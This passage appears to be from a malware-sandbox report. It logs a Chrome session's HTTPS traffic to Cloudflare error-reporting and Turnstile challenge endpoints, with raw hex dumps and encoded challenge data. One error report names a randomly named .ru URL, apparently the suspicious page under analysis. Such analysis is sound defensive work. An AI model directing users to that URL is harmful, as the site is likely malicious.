                                              Via: 1.1 google
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.44977135.190.80.14434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:57 UTC478OUTPOST /report/v4?s=saFgmiTc5V41N8BgPBOMaBvy7irAvCw%2Btf3FREkyT8h9lOkR3%2FyLaeY6s%2B9SSfoqZyWMbiEXBp2PkYnjSiYdr16KA6dwwvSm07Ed8EgdJZnHJ%2FCXmi1HeYiivW2H5A%3D%3D HTTP/1.1
                                              Host: a.nel.cloudflare.com
                                              Connection: keep-alive
                                              Content-Length: 428
                                              Content-Type: application/reports+json
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:57 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 6f 2e 65 65 6d 6a 68 69 75 6c 7a 2e 72 75 2f 7a 4f 37 52 46 4e 47 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 36 36 2e 38 36 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                              Data Ascii: [{"age":0,"body":{"elapsed_time":336,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://to.eemjhiulz.ru/zO7RFNG/","sampling_fraction":1.0,"server_ip":"172.67.166.86","status_code":404,"type":"http.error"},"type":"network-error"
                                              2024-12-18 22:41:57 UTC168INHTTP/1.1 200 OK
                                              Content-Length: 0
                                              date: Wed, 18 Dec 2024 22:41:56 GMT
                                              Via: 1.1 google
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449772104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:57 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:58 UTC379INHTTP/1.1 404 Not Found
                                              Date: Wed, 18 Dec 2024 22:41:58 GMT
                                              Content-Type: application/json
                                              Content-Length: 7
                                              Connection: close
                                              cf-chl-out: JEsArl5SmRfB7d6lH3eAWjrtwmuOXuLTgdQ=$Vi2vS0NdwCooZiv1
                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Server: cloudflare
                                              CF-RAY: 8f42a9d16f930f78-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                              Data Ascii: invalid


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449773104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:57 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f42a9a00a2d7286/1734561715617/fdc9e8a73be2f5579622a47fd9ecfbe90b77079a2071ace2a9e0cdd32ad713a1/KjYAtqfG7Q3SeXb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              Cache-Control: max-age=0
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:58 UTC143INHTTP/1.1 401 Unauthorized
                                              Date: Wed, 18 Dec 2024 22:41:58 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 1
                                              Connection: close
                                              2024-12-18 22:41:58 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 5f 63 6e 6f 70 7a 76 69 39 56 65 57 49 71 52 5f 32 65 7a 37 36 51 74 33 42 35 6f 67 63 61 7a 69 71 65 44 4e 30 79 72 58 45 36 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g_cnopzvi9VeWIqR_2ez76Qt3B5ogcaziqeDN0yrXE6EAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                              2024-12-18 22:41:58 UTC1INData Raw: 4a
                                              Data Ascii: J


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449774104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:59 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f42a9a00a2d7286/1734561715620/LUY0Aidy7FWWS4P HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:00 UTC200INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:00 GMT
                                              Content-Type: image/png
                                              Content-Length: 61
                                              Connection: close
                                              Server: cloudflare
                                              CF-RAY: 8f42a9deff468c60-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:00 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2e 00 00 00 45 08 02 00 00 00 ba e8 43 f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                              Data Ascii: PNGIHDR.ECIDAT$IENDB`


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449775104.18.95.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:01 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f42a9a00a2d7286/1734561715620/LUY0Aidy7FWWS4P HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:01 UTC200INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:01 GMT
                                              Content-Type: image/png
                                              Content-Length: 61
                                              Connection: close
                                              Server: cloudflare
                                              CF-RAY: 8f42a9e96a24434a-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:01 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2e 00 00 00 45 08 02 00 00 00 ba e8 43 f9 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                              Data Ascii: PNGIHDR.ECIDAT$IENDB`


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449776104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:42:01 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              Content-Length: 31349
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Content-type: application/x-www-form-urlencoded
                                              CF-Chl-RetryAttempt: 0
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              CF-Challenge: oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://challenges.cloudflare.com
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:42:01 UTC16384OUTData Raw: 76 5f 38 66 34 32 61 39 61 30 30 61 32 64 37 32 38 36 3d 6d 53 34 63 48 71 6c 2d 39 54 53 6c 39 6f 2d 6c 78 73 45 73 6e 6f 7a 6c 48 73 66 63 32 59 6c 7a 6c 5a 6f 73 74 59 47 69 6c 6d 44 63 76 57 6c 69 73 31 73 57 57 6f 53 78 57 73 4e 7a 73 32 57 71 69 6c 70 6c 6c 7a 63 63 73 33 63 6f 6d 77 33 7a 73 38 7a 72 73 6f 57 71 54 73 36 57 38 56 62 4e 42 73 73 4a 73 5a 57 71 4a 73 25 32 62 61 43 63 24 6c 6e 4b 59 38 71 73 6c 4c 7a 73 41 36 73 54 6b 4f 65 47 42 77 56 78 69 24 7a 73 73 6b 39 73 45 51 73 44 2d 42 70 4a 73 6c 2d 73 71 41 64 61 75 38 70 70 73 71 2d 73 65 77 34 72 71 36 61 6b 6a 34 73 2b 2d 77 2b 4a 2d 6d 38 58 44 61 59 53 63 47 56 44 6f 38 43 58 73 73 65 6f 2d 33 7a 53 54 63 6b 54 44 33 6f 37 6e 64 36 77 56 56 39 52 62 4b 6f 36 6c 52 4e 78 63 52 5a 70
                                              Data Ascii: v_8f42a9a00a2d7286=mS4cHql-9TSl9o-lxsEsnozlHsfc2YlzlZostYGilmDcvWlis1sWWoSxWsNzs2Wqilpllzccs3comw3zs8zrsoWqTs6W8VbNBssJsZWqJs%2baCc$lnKY8qslLzsA6sTkOeGBwVxi$zssk9sEQsD-BpJsl-sqAdau8ppsq-sew4rq6akj4s+-w+J-m8XDaYScGVDo8CXsseo-3zSTckTD3o7nd6wVV9RbKo6lRNxcRZp
                                              2024-12-18 22:42:01 UTC14965OUTData Raw: 4c 38 44 59 69 63 41 53 6d 4d 54 57 47 7a 73 68 6a 49 50 79 39 36 73 5a 73 7a 57 6c 44 73 42 59 54 59 73 38 73 6b 6e 54 34 6c 7a 50 6f 73 6c 24 73 56 73 73 32 62 44 6c 71 59 6d 63 7a 46 7a 6c 73 34 57 7a 59 73 2b 73 5a 4e 38 64 73 35 73 6d 57 73 24 73 4f 73 45 57 47 24 73 45 57 46 76 35 44 6c 69 59 2d 59 54 56 73 49 73 51 59 54 2d 6c 46 73 65 59 54 73 38 37 37 57 54 47 6f 6c 69 59 45 59 73 63 6c 30 50 2b 50 70 73 6c 53 73 74 73 47 57 6c 69 73 6d 64 77 57 73 71 73 2b 73 6c 64 6c 52 6b 6d 37 38 24 73 68 59 54 63 71 70 73 53 73 55 63 71 56 58 7a 73 53 57 38 7a 6c 38 7a 6d 73 2b 44 6c 42 59 7a 73 7a 24 6c 65 73 57 59 71 63 73 38 73 7a 59 7a 34 71 45 73 45 2d 71 2d 73 57 73 77 57 47 41 6c 76 73 4e 62 6f 75 37 57 2b 75 41 47 38 43 37 62 57 56 71 59 73 6b 73 2b
                                              Data Ascii: L8DYicASmMTWGzshjIPy96sZszWlDsBYTYs8sknT4lzPosl$sVss2bDlqYmczFzls4WzYs+sZN8ds5smWs$sOsEWG$sEWFv5DliY-YTVsIsQYT-lFseYTs877WTGoliYEYscl0P+PpslSstsGWlismdwWsqs+sldlRkm78$shYTcqpsSsUcqVXzsSW8zl8zms+DlBYzsz$lesWYqcs8szYz4qEsE-q-sWswWGAlvsNbou7W+uAG8C7bWVqYsks+
                                              2024-12-18 22:42:02 UTC330INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:42:02 GMT
                                              Content-Type: text/plain; charset=UTF-8
                                              Content-Length: 26300
                                              Connection: close
                                              cf-chl-gen: kyp+fN+9ZKskc9dytC3DsqwWx9OT9suc70yTjHpGvdWFL+rzhJW/0ii8IzT1QIGGiqciVgUQhh2U0s4j$mwp0NJmXm1e8HoYb
                                              Server: cloudflare
                                              CF-RAY: 8f42a9eb2f6f43cd-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:42:02 UTC1039INData Raw: 57 33 35 75 58 30 36 50 63 56 35 4a 62 49 4a 49 5a 49 68 58 6d 56 6c 34 64 6e 42 79 6b 57 35 30 64 70 57 50 5a 49 47 5a 6e 35 64 37 71 71 56 32 6e 5a 6d 74 73 72 52 30 68 49 71 32 6f 58 56 7a 6c 4b 36 63 65 6f 6d 2b 6b 5a 43 53 6a 4a 32 61 6a 36 48 44 79 72 69 62 77 70 6a 49 75 49 37 52 79 37 4c 55 69 4c 61 51 6b 37 66 51 78 4e 58 50 32 37 48 58 6d 72 65 38 33 75 57 30 35 61 44 41 75 71 50 4e 70 63 54 64 72 4e 72 41 34 75 4c 6b 79 64 54 4c 35 2f 50 64 36 4c 76 6e 7a 2b 33 68 35 4e 4c 4f 2f 4f 62 39 2b 4d 51 4e 43 50 62 6a 38 4d 72 44 38 76 77 4c 36 2b 49 56 30 52 73 53 39 2b 6a 63 2b 4e 55 55 39 50 76 76 45 69 59 49 2f 41 66 6a 41 66 77 72 4a 50 6f 44 49 76 45 42 44 65 73 50 41 42 45 70 39 51 30 57 47 68 58 34 39 52 52 44 48 52 6b 53 4c 68 31 46 48 53 49
                                              Data Ascii: W35uX06PcV5JbIJIZIhXmVl4dnBykW50dpWPZIGZn5d7qqV2nZmtsrR0hIq2oXVzlK6ceom+kZCSjJ2aj6HDyribwpjIuI7Ry7LUiLaQk7fQxNXP27HXmre83uW05aDAuqPNpcTdrNrA4uLkydTL5/Pd6Lvnz+3h5NLO/Ob9+MQNCPbj8MrD8vwL6+IV0RsS9+jc+NUU9PvvEiYI/AfjAfwrJPoDIvEBDesPABEp9Q0WGhX49RRDHRkSLh1FHSI
                                              2024-12-18 22:42:02 UTC1369INData Raw: 33 55 34 5a 76 66 4a 2b 4b 66 33 65 67 6f 6e 46 65 65 4a 47 41 67 49 71 66 67 5a 39 32 61 33 69 71 65 71 4b 71 73 5a 5a 33 68 58 53 4e 67 36 71 74 70 36 79 72 6b 61 2b 78 70 48 36 36 74 6f 50 4a 77 59 65 71 77 36 53 4c 77 72 6d 69 79 39 4c 51 72 62 44 4f 73 4a 66 62 6b 35 6e 61 76 61 6d 65 77 4e 69 65 34 64 33 61 73 63 61 6b 35 37 66 71 75 4e 33 52 77 71 71 70 34 4f 2f 4f 73 76 6a 57 77 76 54 61 31 64 58 48 2f 63 72 59 41 67 48 36 39 63 4d 47 75 2f 6b 46 39 67 6a 70 43 73 66 77 42 41 44 6a 42 65 73 4a 37 76 41 62 42 64 4d 5a 33 50 54 66 43 77 48 6a 2b 76 55 63 39 2f 55 55 35 42 67 45 47 2b 6b 4a 2f 53 6a 39 46 50 37 78 4d 54 45 7a 4a 2b 7a 32 46 66 67 65 4d 66 34 51 44 6b 49 66 4e 78 67 61 2f 69 4e 44 47 53 70 41 43 45 30 52 55 45 46 52 51 79 38 6a 55 46
                                              Data Ascii: 3U4ZvfJ+Kf3egonFeeJGAgIqfgZ92a3iqeqKqsZZ3hXSNg6qtp6yrka+xpH66toPJwYeqw6SLwrmiy9LQrbDOsJfbk5navamewNie4d3ascak57fquN3Rwqqp4O/OsvjWwvTa1dXH/crYAgH69cMGu/kF9gjpCsfwBADjBesJ7vAbBdMZ3PTfCwHj+vUc9/UU5BgEG+kJ/Sj9FP7xMTEzJ+z2FfgeMf4QDkIfNxga/iNDGSpACE0RUEFRQy8jUF
                                              2024-12-18 22:42:02 UTC1369INData Raw: 58 34 74 59 56 5a 74 37 63 4a 78 31 64 6f 6d 49 69 34 4a 34 65 32 69 74 62 70 47 48 6a 61 31 76 74 36 6d 6f 6d 37 42 30 76 5a 4a 36 6b 4d 4b 59 6d 72 48 46 6e 38 57 6c 6d 4a 6d 73 75 73 37 51 6e 38 58 4a 7a 5a 2f 4d 72 35 4f 55 75 4b 2b 61 78 38 72 56 31 39 61 5a 75 4f 4b 35 77 35 69 76 35 2b 50 4b 70 4f 6e 44 34 2b 6a 77 35 2b 71 75 79 63 69 77 32 4d 62 48 35 2f 54 35 32 41 44 35 41 62 50 54 30 51 62 74 32 76 7a 56 78 51 6e 49 76 73 51 49 2b 41 4c 6d 44 41 30 4a 38 76 45 45 34 75 67 55 37 66 62 31 2f 74 67 4d 46 67 77 43 41 68 77 58 39 52 51 63 42 43 48 70 4b 67 33 36 47 79 2f 38 43 77 67 6a 38 4f 30 36 4a 2f 6a 30 2b 2f 63 4a 46 6a 58 36 4d 78 63 63 4d 52 51 6d 53 43 4a 42 2f 53 4d 71 4c 6b 49 70 52 53 55 6d 4a 53 30 33 54 6b 30 59 57 46 52 4f 55 53 68
                                              Data Ascii: X4tYVZt7cJx1domIi4J4e2itbpGHja1vt6mom7B0vZJ6kMKYmrHFn8WlmJmsus7Qn8XJzZ/Mr5OUuK+ax8rV19aZuOK5w5iv5+PKpOnD4+jw5+quyciw2MbH5/T52AD5AbPT0Qbt2vzVxQnIvsQI+ALmDA0J8vEE4ugU7fb1/tgMFgwCAhwX9RQcBCHpKg36Gy/8Cwgj8O06J/j0+/cJFjX6MxccMRQmSCJB/SMqLkIpRSUmJS03Tk0YWFROUSh
                                              2024-12-18 22:42:02 UTC1369INData Raw: 33 4b 44 6e 6d 57 63 5a 35 64 36 65 35 36 4b 66 36 69 47 74 61 32 44 74 6f 79 49 75 4a 78 34 6b 49 6d 4c 72 4b 71 51 6e 61 36 50 6b 49 69 48 76 4c 32 36 70 73 32 4c 69 70 43 62 77 73 37 45 73 62 53 35 73 4c 69 6e 75 62 61 5a 71 70 79 77 6d 4b 7a 57 74 37 50 6c 75 35 75 79 36 63 7a 4f 75 4f 62 71 34 63 54 72 33 75 48 58 33 38 72 47 79 73 54 34 74 2f 37 34 73 74 72 55 31 65 2b 2f 2f 41 66 48 2f 4e 76 46 31 63 62 62 78 38 77 47 46 41 54 6d 45 52 4c 79 30 77 59 46 42 2f 4d 53 42 2f 51 5a 44 50 76 67 37 78 76 64 41 66 41 4b 48 2f 37 35 42 52 72 37 48 68 34 71 4b 67 49 4e 4f 42 63 72 4d 43 6f 4f 48 50 6b 50 50 69 41 71 2f 54 63 54 4c 7a 4d 79 50 6a 30 42 4a 52 73 65 49 42 6b 65 42 42 30 6b 51 51 34 71 57 46 6b 52 50 42 55 76 45 46 51 78 4c 44 4a 56 52 55 35 6d
                                              Data Ascii: 3KDnmWcZ5d6e56Kf6iGta2DtoyIuJx4kImLrKqQna6PkIiHvL26ps2LipCbws7EsbS5sLinubaZqpywmKzWt7Plu5uy6czOuObq4cTr3uHX38rGysT4t/74strU1e+//AfH/NvF1cbbx8wGFATmERLy0wYFB/MSB/QZDPvg7xvdAfAKH/75BRr7Hh4qKgINOBcrMCoOHPkPPiAq/TcTLzMyPj0BJRseIBkeBB0kQQ4qWFkRPBUvEFQxLDJVRU5m
                                              2024-12-18 22:42:02 UTC1369INData Raw: 31 2f 67 47 71 72 5a 4a 2b 76 6a 59 6d 69 6c 72 57 45 6b 59 75 79 64 62 6d 5a 76 4c 53 34 66 61 47 30 6c 37 53 6c 75 61 75 61 6e 62 79 4a 69 5a 43 76 6f 38 48 4d 7a 4b 43 77 71 4b 37 4e 73 61 6d 39 72 37 36 2b 76 74 76 52 35 64 33 69 33 64 71 33 74 4d 79 6e 76 38 6a 44 38 75 61 78 38 72 2b 79 74 50 62 55 38 75 62 62 31 65 37 67 37 50 4d 42 33 66 61 38 39 39 58 56 41 77 6e 4c 31 77 6a 32 79 65 58 4c 2f 4d 33 6d 35 51 62 6d 37 52 63 44 37 42 58 6e 44 68 54 71 39 68 49 62 49 66 34 55 48 76 6e 70 48 51 6e 65 46 69 45 50 43 75 63 67 41 68 49 6d 49 51 67 50 46 42 6f 76 2b 43 34 76 44 77 34 7a 4a 44 74 41 4d 6a 4d 6d 4d 53 51 31 51 30 67 2b 4f 51 73 75 50 30 67 6c 51 54 4e 43 4a 68 49 36 54 79 78 4d 48 54 34 39 45 79 39 51 51 7a 38 77 53 44 68 59 56 6c 30 6c 4e
                                              Data Ascii: 1/gGqrZJ+vjYmilrWEkYuydbmZvLS4faG0l7SluauanbyJiZCvo8HMzKCwqK7Nsam9r76+vtvR5d3i3dq3tMynv8jD8uax8r+ytPbU8ubb1e7g7PMB3fa899XVAwnL1wj2yeXL/M3m5Qbm7RcD7BXnDhTq9hIbIf4UHvnpHQneFiEPCucgAhImIQgPFBov+C4vDw4zJDtAMjMmMSQ1Q0g+OQsuP0glQTNCJhI6TyxMHT49Ey9QQz8wSDhYVl0lN
                                              2024-12-18 22:42:02 UTC1369INData Raw: 53 6e 32 31 79 71 4b 47 30 6b 49 75 55 76 62 6d 39 6a 62 4b 43 6d 35 7a 48 6d 38 43 33 79 62 53 4b 70 4d 53 6a 30 5a 72 51 79 62 4f 79 78 63 37 45 70 73 76 52 6a 72 6e 53 79 72 36 73 30 4a 36 57 75 74 6a 49 78 74 4b 69 7a 4f 33 49 33 73 44 6f 37 36 6e 64 71 73 50 32 74 74 4c 4d 2b 4c 71 79 30 66 37 33 79 38 34 41 2f 62 62 7a 43 4e 76 58 30 2f 6e 72 79 65 73 41 79 67 33 72 42 65 67 4b 38 67 76 54 46 66 51 4c 31 2f 72 30 44 68 63 4e 37 74 6e 65 46 51 34 68 2f 50 63 42 4b 69 59 71 2b 52 2f 75 43 41 6b 30 43 43 30 6b 4e 69 48 32 45 54 45 51 50 67 63 39 4e 69 41 66 4e 77 42 42 48 44 67 44 52 53 45 39 44 45 45 6c 51 41 77 66 49 45 4d 2f 4b 79 5a 4c 55 53 51 7a 58 42 74 47 4d 56 34 77 58 69 31 6b 49 32 59 34 58 54 78 48 48 47 77 70 4f 45 4a 74 57 6b 4d 2f 5a 47
                                              Data Ascii: Sn21yqKG0kIuUvbm9jbKCm5zHm8C3ybSKpMSj0ZrQybOyxc7EpsvRjrnSyr6s0J6WutjIxtKizO3I3sDo76ndqsP2ttLM+Lqy0f73y84A/bbzCNvX0/nryesAyg3rBegK8gvTFfQL1/r0DhcN7tneFQ4h/PcBKiYq+R/uCAk0CC0kNiH2ETEQPgc9NiAfNwBBHDgDRSE9DEElQAwfIEM/KyZLUSQzXBtGMV4wXi1kI2Y4XTxHHGwpOEJtWkM/ZG
                                              2024-12-18 22:42:02 UTC1369INData Raw: 73 6f 61 62 73 48 70 39 6e 72 4e 2b 64 71 4f 33 76 62 79 66 76 49 65 30 70 37 2f 47 72 71 6e 46 6f 34 32 71 78 72 65 56 74 38 32 38 73 72 6a 51 6d 70 32 32 31 4e 6d 68 74 74 65 69 70 63 58 64 75 36 58 45 34 4b 75 36 79 2b 50 54 36 4d 7a 6f 32 4d 72 55 37 66 4c 4f 32 4f 2f 67 79 74 33 79 34 37 62 68 2b 4e 66 42 34 76 33 73 33 75 73 41 79 73 33 69 42 4d 2f 79 37 41 6a 34 34 75 34 4d 31 2b 72 7a 45 42 59 56 2b 52 54 66 39 67 51 61 2b 50 4c 2b 48 67 7a 6c 41 78 38 52 2b 67 6f 6c 46 51 63 53 4b 66 4d 48 46 69 34 4d 2b 51 38 78 45 52 4d 59 4e 66 37 39 49 54 6b 2f 4a 79 41 2b 48 45 45 6d 51 51 73 4b 4a 30 55 6c 4a 79 31 4b 4f 42 49 7a 53 7a 30 72 4d 31 4a 58 4c 7a 78 57 4e 43 4a 45 57 45 6c 52 4f 31 77 6f 52 30 68 68 55 43 4e 4b 5a 55 56 44 54 32 64 5a 52 31 4a
                                              Data Ascii: soabsHp9nrN+dqO3vbyfvIe0p7/GrqnFo42qxreVt828srjQmp221NmhtteipcXdu6XE4Ku6y+PT6Mzo2MrU7fLO2O/gyt3y47bh+NfB4v3s3usAys3iBM/y7Aj44u4M1+rzEBYV+RTf9gQa+PL+HgzlAx8R+golFQcSKfMHFi4M+Q8xERMYNf79ITk/JyA+HEEmQQsKJ0UlJy1KOBIzSz0rM1JXLzxWNCJEWElRO1woR0hhUCNKZUVDT2dZR1J
